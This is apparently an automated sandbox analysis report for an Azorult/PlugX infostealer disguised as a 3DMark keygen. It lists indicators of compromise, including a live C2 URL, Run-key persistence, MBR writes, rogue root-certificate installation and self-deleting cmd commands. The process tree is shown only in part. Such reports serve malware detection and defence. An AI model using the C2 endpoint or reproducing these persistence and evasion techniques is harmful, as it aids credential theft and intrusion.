azorult | a2d3d6430f6775951cf988d960cfae4093d7a1e4d0f684ddfffaf4599ace9a71

Resubmissions

18-11-2020 14:18

201118-dj27sn3f52 10

18-11-2020 13:42

201118-1arz86e7w6 10

18-11-2020 13:38

201118-n8jh228ctn 10

Analysis

max time kernel
1801s
max time network
1811s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 14:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3DMark 11 Advanced Edition.bin.exe

Score

10^/10

azorult plugx bootkit discovery evasion infostealer macro persistence spyware stealer trojan upx xlm

Malware Config

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
trojan plugx

Nirsoft 8 IoCs

resource	yara_rule
behavioral3/files/0x000200000001abc8-117.dat	Nirsoft
behavioral3/files/0x000200000001abc8-118.dat	Nirsoft
behavioral3/files/0x000400000001abc8-127.dat	Nirsoft
behavioral3/files/0x000400000001abc8-128.dat	Nirsoft
behavioral3/files/0x000600000001abc8-136.dat	Nirsoft
behavioral3/files/0x000600000001abc8-135.dat	Nirsoft
behavioral3/files/0x000800000001abc8-144.dat	Nirsoft
behavioral3/files/0x000800000001abc8-143.dat	Nirsoft

Downloads MZ/PE file

Executes dropped EXE 27 IoCs

pid	Process
3240	intro.exe
200	keygen-pr.exe
212	keygen-step-1.exe
1240	keygen-step-2.exe
3784	keygen-step-3.exe
820	keygen-step-4.exe
348	key.exe
1536	002.exe
3092	Setup.exe
1176	setup.exe
1120	aliens.exe
2104	jg2_2qua.exe
1032	askinstall21.exe
3356	hjjgaa.exe
3224	jfiag3g_gg.exe
2416	1A27AE19C9E414DC.exe
204	1A27AE19C9E414DC.exe
816	jfiag3g_gg.exe
1864	1605712587875.exe
2444	1605712592235.exe
616	1605712597672.exe
2524	1605712600360.exe
2608	ThunderFW.exe
3824	MiniThunderPlatform.exe
1444	1021C014A4C9A552.exe
2672	1021C014A4C9A552.tmp
2724	seed.sfx.exe

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

resource	yara_rule
behavioral3/files/0x000300000001abc2-82.dat	office_xlm_macros

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/0x000300000001abc4-91.dat	upx
behavioral3/files/0x000300000001abc4-92.dat	upx
behavioral3/files/0x000300000001abc4-106.dat	upx
behavioral3/files/0x000300000001abc4-107.dat	upx

Loads dropped DLL 13 IoCs

pid	Process
3092	Setup.exe
3092	Setup.exe
3092	Setup.exe
3136	MsiExec.exe
2416	1A27AE19C9E414DC.exe
2416	1A27AE19C9E414DC.exe
3824	MiniThunderPlatform.exe
3824	MiniThunderPlatform.exe
3824	MiniThunderPlatform.exe
3824	MiniThunderPlatform.exe
3824	MiniThunderPlatform.exe
3824	MiniThunderPlatform.exe
3824	MiniThunderPlatform.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg2_2qua.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	aliens.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1A27AE19C9E414DC.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1A27AE19C9E414DC.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
51	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	aliens.exe
File opened for modification	\??\PhysicalDrive0	1A27AE19C9E414DC.exe
File opened for modification	\??\PhysicalDrive0	1A27AE19C9E414DC.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1120	aliens.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2416 set thread context of 3244	2416	1A27AE19C9E414DC.exe	116
PID 2416 set thread context of 648	2416	1A27AE19C9E414DC.exe	124
PID 2416 set thread context of 2964	2416	1A27AE19C9E414DC.exe	126
PID 2416 set thread context of 1048	2416	1A27AE19C9E414DC.exe	128

Drops file in Program Files directory 33 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\RearRips\images\is-PNCJ2.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-0I7II.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\9ku5npt6tedk\aliens.exe	setup.exe
File opened for modification	C:\Program Files (x86)\RearRips\seed.sfx.exe	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-DQLU1.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\9ku5npt6tedk\__tmp_rar_sfx_access_check_260994390	setup.exe
File created	C:\Program Files (x86)\RearRips\is-S7L97.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-9ELPT.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-S3V9D.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-9D8QM.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-BK8T4.tmp	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\RearRips\DreamTrip.exe	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\unins000.dat	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-E5BUH.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\lang\is-UMMJ9.tmp	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\RearRips\unins000.dat	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\9ku5npt6tedk\aliens.exe	setup.exe
File created	C:\Program Files (x86)\RearRips\images\is-JOJTL.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-E8UIS.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-ECQ1L.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-TRG81.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-JDK6G.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-QTFT1.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-G9TO5.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-4HL8T.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-R0CID.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-5GE29.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-TM6C3.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-3H7F6.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-TQN4I.tmp	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\9ku5npt6tedk	setup.exe
File created	C:\Program Files (x86)\RearRips\is-GMF4A.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\lang\is-CP2G9.tmp	1021C014A4C9A552.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	1A27AE19C9E414DC.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	1A27AE19C9E414DC.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	1A27AE19C9E414DC.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	1A27AE19C9E414DC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	1A27AE19C9E414DC.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	1A27AE19C9E414DC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	1A27AE19C9E414DC.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	1A27AE19C9E414DC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	1A27AE19C9E414DC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	1A27AE19C9E414DC.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	1A27AE19C9E414DC.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	1A27AE19C9E414DC.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
824	taskkill.exe
1404	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	aliens.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	aliens.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
1264	PING.EXE
2380	PING.EXE
2108	PING.EXE
1600	PING.EXE
2800	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
816	jfiag3g_gg.exe
816	jfiag3g_gg.exe
1864	1605712587875.exe
1864	1605712587875.exe
2444	1605712592235.exe
2444	1605712592235.exe
616	1605712597672.exe
616	1605712597672.exe
2524	1605712600360.exe
2524	1605712600360.exe
2672	1021C014A4C9A552.tmp
2672	1021C014A4C9A552.tmp

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeManageVolumePrivilege	2104	jg2_2qua.exe
Token: SeManageVolumePrivilege	2104	jg2_2qua.exe
Token: SeShutdownPrivilege	2676	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2676	msiexec.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeSecurityPrivilege	3368	msiexec.exe
Token: SeCreateTokenPrivilege	2676	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2676	msiexec.exe
Token: SeLockMemoryPrivilege	2676	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2676	msiexec.exe
Token: SeMachineAccountPrivilege	2676	msiexec.exe
Token: SeTcbPrivilege	2676	msiexec.exe
Token: SeSecurityPrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeLoadDriverPrivilege	2676	msiexec.exe
Token: SeSystemProfilePrivilege	2676	msiexec.exe
Token: SeSystemtimePrivilege	2676	msiexec.exe
Token: SeProfSingleProcessPrivilege	2676	msiexec.exe
Token: SeIncBasePriorityPrivilege	2676	msiexec.exe
Token: SeCreatePagefilePrivilege	2676	msiexec.exe
Token: SeCreatePermanentPrivilege	2676	msiexec.exe
Token: SeBackupPrivilege	2676	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeShutdownPrivilege	2676	msiexec.exe
Token: SeDebugPrivilege	2676	msiexec.exe
Token: SeAuditPrivilege	2676	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2676	msiexec.exe
Token: SeChangeNotifyPrivilege	2676	msiexec.exe
Token: SeRemoteShutdownPrivilege	2676	msiexec.exe
Token: SeUndockPrivilege	2676	msiexec.exe
Token: SeSyncAgentPrivilege	2676	msiexec.exe
Token: SeEnableDelegationPrivilege	2676	msiexec.exe
Token: SeManageVolumePrivilege	2676	msiexec.exe
Token: SeImpersonatePrivilege	2676	msiexec.exe
Token: SeCreateGlobalPrivilege	2676	msiexec.exe
Token: SeCreateTokenPrivilege	2676	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2676	msiexec.exe
Token: SeLockMemoryPrivilege	2676	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2676	msiexec.exe
Token: SeMachineAccountPrivilege	2676	msiexec.exe
Token: SeTcbPrivilege	2676	msiexec.exe
Token: SeSecurityPrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeLoadDriverPrivilege	2676	msiexec.exe
Token: SeSystemProfilePrivilege	2676	msiexec.exe
Token: SeSystemtimePrivilege	2676	msiexec.exe
Token: SeProfSingleProcessPrivilege	2676	msiexec.exe
Token: SeIncBasePriorityPrivilege	2676	msiexec.exe
Token: SeCreatePagefilePrivilege	2676	msiexec.exe
Token: SeCreatePermanentPrivilege	2676	msiexec.exe
Token: SeBackupPrivilege	2676	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeShutdownPrivilege	2676	msiexec.exe
Token: SeDebugPrivilege	2676	msiexec.exe
Token: SeAuditPrivilege	2676	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2676	msiexec.exe
Token: SeChangeNotifyPrivilege	2676	msiexec.exe
Token: SeRemoteShutdownPrivilege	2676	msiexec.exe
Token: SeUndockPrivilege	2676	msiexec.exe
Token: SeSyncAgentPrivilege	2676	msiexec.exe
Token: SeEnableDelegationPrivilege	2676	msiexec.exe
Token: SeManageVolumePrivilege	2676	msiexec.exe
Token: SeImpersonatePrivilege	2676	msiexec.exe
Token: SeCreateGlobalPrivilege	2676	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2676	msiexec.exe
2672	1021C014A4C9A552.tmp

Suspicious use of SetWindowsHookEx 21 IoCs

pid	Process
1240	keygen-step-2.exe
1536	002.exe
1536	002.exe
3092	Setup.exe
1176	setup.exe
1120	aliens.exe
2416	1A27AE19C9E414DC.exe
204	1A27AE19C9E414DC.exe
3244	firefox.exe
1864	1605712587875.exe
648	firefox.exe
2444	1605712592235.exe
2964	firefox.exe
616	1605712597672.exe
1048	firefox.exe
2524	1605712600360.exe
2608	ThunderFW.exe
3824	MiniThunderPlatform.exe
1444	1021C014A4C9A552.exe
2672	1021C014A4C9A552.tmp
2724	seed.sfx.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 848 wrote to memory of 3608	848	3DMark 11 Advanced Edition.bin.exe	78
PID 848 wrote to memory of 3608	848	3DMark 11 Advanced Edition.bin.exe	78
PID 848 wrote to memory of 3608	848	3DMark 11 Advanced Edition.bin.exe	78
PID 3608 wrote to memory of 3240	3608	cmd.exe	81
PID 3608 wrote to memory of 3240	3608	cmd.exe	81
PID 3608 wrote to memory of 3240	3608	cmd.exe	81
PID 3608 wrote to memory of 200	3608	cmd.exe	82
PID 3608 wrote to memory of 200	3608	cmd.exe	82
PID 3608 wrote to memory of 200	3608	cmd.exe	82
PID 3608 wrote to memory of 212	3608	cmd.exe	83
PID 3608 wrote to memory of 212	3608	cmd.exe	83
PID 3608 wrote to memory of 212	3608	cmd.exe	83
PID 3608 wrote to memory of 1240	3608	cmd.exe	84
PID 3608 wrote to memory of 1240	3608	cmd.exe	84
PID 3608 wrote to memory of 1240	3608	cmd.exe	84
PID 3608 wrote to memory of 3784	3608	cmd.exe	85
PID 3608 wrote to memory of 3784	3608	cmd.exe	85
PID 3608 wrote to memory of 3784	3608	cmd.exe	85
PID 3784 wrote to memory of 4088	3784	keygen-step-3.exe	86
PID 3784 wrote to memory of 4088	3784	keygen-step-3.exe	86
PID 3784 wrote to memory of 4088	3784	keygen-step-3.exe	86
PID 3608 wrote to memory of 820	3608	cmd.exe	87
PID 3608 wrote to memory of 820	3608	cmd.exe	87
PID 3608 wrote to memory of 820	3608	cmd.exe	87
PID 200 wrote to memory of 348	200	keygen-pr.exe	89
PID 200 wrote to memory of 348	200	keygen-pr.exe	89
PID 200 wrote to memory of 348	200	keygen-pr.exe	89
PID 4088 wrote to memory of 2800	4088	cmd.exe	90
PID 4088 wrote to memory of 2800	4088	cmd.exe	90
PID 4088 wrote to memory of 2800	4088	cmd.exe	90
PID 820 wrote to memory of 1536	820	keygen-step-4.exe	91
PID 820 wrote to memory of 1536	820	keygen-step-4.exe	91
PID 820 wrote to memory of 1536	820	keygen-step-4.exe	91
PID 348 wrote to memory of 2340	348	key.exe	92
PID 348 wrote to memory of 2340	348	key.exe	92
PID 348 wrote to memory of 2340	348	key.exe	92
PID 1240 wrote to memory of 3612	1240	keygen-step-2.exe	94
PID 1240 wrote to memory of 3612	1240	keygen-step-2.exe	94
PID 1240 wrote to memory of 3612	1240	keygen-step-2.exe	94
PID 3612 wrote to memory of 1264	3612	cmd.exe	96
PID 3612 wrote to memory of 1264	3612	cmd.exe	96
PID 3612 wrote to memory of 1264	3612	cmd.exe	96
PID 820 wrote to memory of 3092	820	keygen-step-4.exe	93
PID 820 wrote to memory of 3092	820	keygen-step-4.exe	93
PID 820 wrote to memory of 3092	820	keygen-step-4.exe	93
PID 3092 wrote to memory of 1176	3092	Setup.exe	97
PID 3092 wrote to memory of 1176	3092	Setup.exe	97
PID 3092 wrote to memory of 1176	3092	Setup.exe	97
PID 1176 wrote to memory of 1120	1176	setup.exe	98
PID 1176 wrote to memory of 1120	1176	setup.exe	98
PID 1176 wrote to memory of 1120	1176	setup.exe	98
PID 820 wrote to memory of 2104	820	keygen-step-4.exe	99
PID 820 wrote to memory of 2104	820	keygen-step-4.exe	99
PID 820 wrote to memory of 2104	820	keygen-step-4.exe	99
PID 820 wrote to memory of 1032	820	keygen-step-4.exe	100
PID 820 wrote to memory of 1032	820	keygen-step-4.exe	100
PID 820 wrote to memory of 1032	820	keygen-step-4.exe	100
PID 1120 wrote to memory of 2676	1120	aliens.exe	101
PID 1120 wrote to memory of 2676	1120	aliens.exe	101
PID 1120 wrote to memory of 2676	1120	aliens.exe	101
PID 1032 wrote to memory of 2928	1032	askinstall21.exe	102
PID 1032 wrote to memory of 2928	1032	askinstall21.exe	102
PID 1032 wrote to memory of 2928	1032	askinstall21.exe	102
PID 2928 wrote to memory of 824	2928	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.bin.exe
"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
    intro.exe 1O5ZF
    3⤵
    - Executes dropped EXE
    PID:3240
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:200
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:348
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:2340
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
    keygen-step-2.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1240
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3612
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:1264
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3784
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4088
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2800
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:820
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1536
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3092
    - - C:\Users\Admin\AppData\Local\Temp\sib68E5.tmp\0\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sib68E5.tmp\0\setup.exe" -s
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1176
      - C:\Program Files (x86)\9ku5npt6tedk\aliens.exe
        
        "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
        6⤵
